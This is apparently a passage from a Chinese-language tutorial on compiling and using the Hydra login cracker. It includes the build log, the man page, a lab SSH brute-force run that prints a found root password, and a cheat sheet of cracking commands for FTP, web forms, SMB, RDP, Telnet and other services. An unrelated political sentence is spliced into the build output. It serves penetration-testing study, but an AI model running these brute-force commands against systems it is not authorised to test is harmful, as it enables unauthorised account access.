hydra-icq.o hydra-cisco-enable.o hydra-ldap.o hydra-mysql.o hydra-mssql.o hydra-xmpp.o hydra-http-proxy-urlenum.o hydra-snmp.o hydra-cvs.o hydra-smtp.o hydra-smtp-enum.o hydra-sapr3.o hydra-ssh.o hydra-sshkey.o hydra-teamspeak.o hydra-postgres.o hydra-rsh.o hydra-rlogin.o hydra-oracle-listener.o hydra-svn.o hydra-pcanywhere.o hydra-sip.o hydra-oracle-sid.o hydra-oracle.o hydra-vmauthd.o hydra-firebird.o hydra-afp.o hydra-ncp.o hydra-http-proxy.o hydra-http-form.o hydra-irc.o hydra-rdp.o crc32.o d3des.o bfg.o ntlm.o sasl.o hmacmd5.o hydra-mod.o -lm -lssl -lpcre -lpq -lsvn_client-1 -lapr-1 -laprutil-1 -lsvn_subr-1 -lcrypto -L/usr/lib -L/usr/local/lib -L/lib -L/usr/lib -I/usr/include/subversion-1 -I/usr/include/apr-1 -I/usr/include/subversion-1 -DLIBOPENSSL -DLIBOPENSSLNEW -DHAVE_PCRE -DLIBPOSTGRES -DLIBSVN -DHAVE_MATH_H 97 98 If men could get pregnant, abortion would be a sacrament 99 100 101 Now type make install 102 103 Now type make install 104 strip hydra pw-inspector 105 echo OK > /dev/null && test -x xhydra && strip xhydra || echo OK > /dev/null 106 mkdir -p /usr/local/bin 107 cp -f hydra pw-inspector /usr/local/bin && cd /usr/local/bin && chmod 755 hydra pw-inspector 108 echo OK > /dev/null && test -x xhydra && cp xhydra /usr/local/bin && cd /usr/local/bin && chmod 755 xhydra || echo OK > /dev/null 109 sed -e "s|^INSTALLDIR=.*|INSTALLDIR="/usr/local"|" dpl4hydra.sh > /usr/local/bin/dpl4hydra.sh 110 chmod 755 /usr/local/bin/dpl4hydra.sh 111 cp -f *.csv /usr/local/etc/ 112 mkdir -p /usr/local/man/man1 113 cp -f hydra.1 xhydra.1 pw-inspector.1 /usr/local/man/man1
到這里已經安裝完成 可以man下hydra的使用方法
1 [root@localhost hydra-7.4.2]# man hydra 2 HYDRA(1) HYDRA(1) 3 4 NAME 5 hydra - a very fast network logon cracker which support many different services 6 7 SYNOPSIS 8 hydra 9 [[[-l LOGIN|-L FILE] [-p PASS|-P FILE|-x OPT]] | [-C FILE]] [-e nsr] 10 [-u] [-f] [-F] [-M FILE] [-o FILE] [-t TASKS] [-w TIME] [-W TIME] 11 [-s PORT] [-S] [-4/6] [-vV] [-d] 12 server service [OPTIONAL_SERVICE_PARAMETER] 13 14 DESCRIPTION 15 Hydra is a parallized login cracker which supports numerous protocols to attack. New modules are easy to add, beside that, it is 16 flexible and very fast. 17 18 This tool gives researchers and security consultants the possiblity to show how easy it would be to gain unauthorized access from 19 remote to a system. 20 21 Currently this tool supports: 22 AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, FTPS, 23 HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, 24 HTTP-PROXY-URLENUM, ICQ, IMAP, IRC, LDAP2, LDAP3, MS-SQL, MYSQL, NCP, NNTP, 25 Oracle, Oracle-Listener, Oracle-SID, PC-Anywhere, PCNFS, POP3, POSTGRES, 26 RDP, REXEC, RLOGIN, RSH, SAP/R3, SIP, SMB, SMTP, SMTP-Enum, SNMP, 27 SOCKS5, SSH(v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, 28 VMware-Auth, VNC and XMPP. 29 For most protocols, SSL mode is available (e.g. https-get, ftp-ssl, etc.) 30 If not all necessary libraries are found during compile time, your 31 available services will be less. Type "hydra" to see what is available. 32 33 Options 34 target a target to attack, can be an IPv4 address, IPv6 address or DNS name. 35 36 service 37 a service to attack, see the list of protocols available 38 39 OPTIONAL SERVICE PARAMETER 40 Some modules have optional or mandatory options. type "hydra -U <servicename>" 41 to get help on on the options of a service. 42 43 -R restore a previously aborted session. Requires a hydra.restore file was written. No other options are allowed when using -R
繼續從上一次進度接着破解 44 45 -S connect via SSL 46 大寫,采用SSL鏈接 47 -s PORT 48 if the service is on a different default port, define it here 小寫,可通過這個參數指定非默認端口 49 50 -l LOGIN 51 or -L FILE login with LOGIN name, or load several logins from FILE 53 -p PASS 54 or -P FILE try password PASS, or load several passwords from FILE 55 56 -x min:max:charset 57 generate passwords from min to max length. charset can contain 1 58 for numbers, a for lowcase and A for upcase characters. 59 Any other character is added is put to the list. 60 Example: 1:2:a1%. 61 The generated passwords will be of length 1 to 2 and contain 62 lowcase letters, numbers and/or percent signs and dots. 63 64 -e nsr additional checks, "n" for null password, "s" try login as pass, "r" try the reverse login as pass 65 66 -C FILE 67 colon separated "login:pass" format, instead of -L/-P options 68 69 -u by default Hydra checks all passwords for one login and then tries the next login. This option loops around the passwords, so 70 the first password is tried on all logins, then the next password. 71 72 -f exit after the first found login/password pair (per host if -M) 73 74 -F exit after the first found login/password pair for any host (for usage with -M) 75 76 -M FILE 77 server list for parallel attacks, one entry per line 78 79 -o FILE 80 write found login/password pairs to FILE instead of stdout 81 82 -t TASKS 83 run TASKS number of connects in parallel (default: 16) 84 85 -w TIME 86 defines the max wait time in seconds for responses (default: 32) 87 88 -w TIME 89 defines a wait time between each connection a task performs. This usually only makes sense if a low task number is used, .e.g 90 -t 1 91 92 -4 / -6 93 prefer IPv4 (default) or IPv6 addresses 94 95 -v / -V 96 verbose mode / show login+pass combination for each attempt -d debug mode 97 98 -h, --help 99 Show summary of options. 100 101 SEE ALSO 102 xhydra(1), pw-inspector(1). 103 The programs are documented fully by van Hauser <vh@thc.org> 104 105 AUTHOR 106 hydra was written by van Hauser / THC <vh@thc.org> and is co-maintained by David Maciejak <david.maciejak@gmail.com>. 107 108 This manual page was written by Daniel Echeverry <epsilon77@gmail.com>, for the Debian project (and may be used by others). 109 110 24/05/2012 HYDRA(1)
下面來演示下破解;
首先本人只是實驗沒有真正的去網上下載密碼庫字典,手動寫了兩個文件 users.txt和password.txt
1 [root@localhost hydra-7.4.2]# cat users.txt 2 root 3 [root@localhost hydra-7.4.2]# cat password.txt 4 111...AAA 5 111...aaa 6 abcdddccc 7 baidu.com 8 DELL2012. 9 ddddaaa11
不過在運行命令的時候報錯了0 0!
[root@localhost~]#hydra 192.168.1.253 ssh -l root -p passwrod.txt [ERROR] Compiled without LIBSSH v0.4.x support, module is not available!
提示沒有libssh這個支持 真的嗎?
[root@localhost ~]#rpm -qa |grep libssh*
查看是什么都沒有- -!
好嘛yum下試試
[root@localhost ~]#yum -y install libssh*
Loaded plugins: fastestmirror, refresh-packagekit
Loading mirror speeds from cached hostfile
* base: mirrors.btte.net
* extras: mirrors.btte.net
* updates: centos.ustc.edu.cn
Setting up Install Process
No package libssh-0.4.8 available.
No package libssh-0.4.8.tar.gz available.
Error: Nothing to do
呵呵 原來沒有rpm包只有源碼
查看了下網上找下
wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz
tar zxvf libssh-0.4.8.tar.gz
cd libssh-0.4.8
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..
make
make install
這個可行,不過我cp代碼提示錯誤 只好手工敲了一遍OK可以安裝成功!
然后重新編譯下hydra 進入到解壓目錄
cd ../../hydra-7.4.2/
然后執行 make clean
1 然后執行 經典三部曲 2 ./configure 3 make && make install 4 安裝如無報錯跟上文編譯提示一樣。 5 好了OK現在安裝完畢 6 現在執行下試試 7 [root@localhost ~]# hydra 192.168.1.253 ssh -l root -P passwrod.txt 8 Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only 9 10 Hydra (http://www.thc.org/thc-hydra) starting at 2013-06-19 00:14:00 11 [DATA] 7 tasks, 1 server, 7 login tries (l:1/p:7), ~1 try per task 12 [DATA] attacking service ssh on port 22 13 [22][ssh] host: 192.168.1.253 login: root password: DELL2012. 14 1 of 1 target successfully completed, 1 valid password found 15 Hydra (http://www.thc.org/thc-hydra) finished at 2013-06-19 00:14:02 16 17 呵呵這里要說明下 password.txt是本人手寫的強大的密碼庫可以去網上下載 18 [root@localhost ~]# cat passwrod.txt 19 adsadsa 20 sadsaqhjk 21 132321hj 22 dsads13213 23 DELL2012. 24 DSADJHK. 25 111...AAA 26 呵呵我的就這么幾個密碼數據所有破解起來是比較快的
當然上述只是一個實驗,想要獲取更好的體驗效果可以下載更強大的密碼庫文件!
更多的使用技巧
五、其他類型密碼破解
- 破解ftp:
# hydra ip ftp -l 用戶名 -P 密碼字典 -t 線程(默認16) -vV # hydra ip ftp -l 用戶名 -P 密碼字典 -e ns -vV
- get方式提交,破解web登錄:
# hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns ip http-get /admin/ # hydra -l 用戶名 -p 密碼字典 -t 線程 -vV -e ns -f ip http-get /admin/index.php
- post方式提交,破解web登錄:
該軟件的強大之處就在於支持多種協議的破解,同樣也支持對於web用戶界面的登錄破解,get方式提交的表單比較簡單,這里通過post方式提交密碼破解提供思路。該工具有一個不好的地方就是,如果目標網站登錄時候需要驗證碼就無法破解了。帶參數破解如下:
<form action="index.php" method="POST"> <input type="text" name="name" /><BR><br> <input type="password" name="pwd" /><br><br> <input type="submit" name="sub" value="提交"> </form>
假設有以上一個密碼登錄表單,我們執行命令:
# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”
說明:破解的用戶名是admin,密碼字典是pass.lst,破解結果保存在ok.lst,-t 是同時線程數為1,-f 是當破解了一個密碼就停止,ip 是本地,就是目標ip,http-post-form表示破解是采用http 的post 方式提交的表單密碼破解。
后面參數是網頁中對應的表單字段的name 屬性,后面<title>中的內容是表示錯誤猜解的返回信息提示,可以自定義。
- 破解https:
# hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
- 破解teamspeak:
# hydra -l 用戶名 -P 密碼字典 -s 端口號 -vV ip teamspeak
- 破解cisco:
# hydra -P pass.txt 10.36.16.18 cisco # hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
- 破解smb:
# hydra -l administrator -P pass.txt 10.36.16.18 smb
- 破解pop3:
# hydra -l muts -P pass.txt my.pop3.mail pop3
- 破解rdp:
# hydra ip rdp -l administrator -P pass.txt -V
- 破解http-proxy:
# hydra -l admin -P pass.txt http-proxy://10.36.16.18
- 破解imap:
# hydra -L user.txt -p secret 10.36.16.18 imap PLAIN # hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
- 破解telnet
# hydra ip telnet -l 用戶 -P 密碼字典 -t 32 -s 23 -e ns -f -V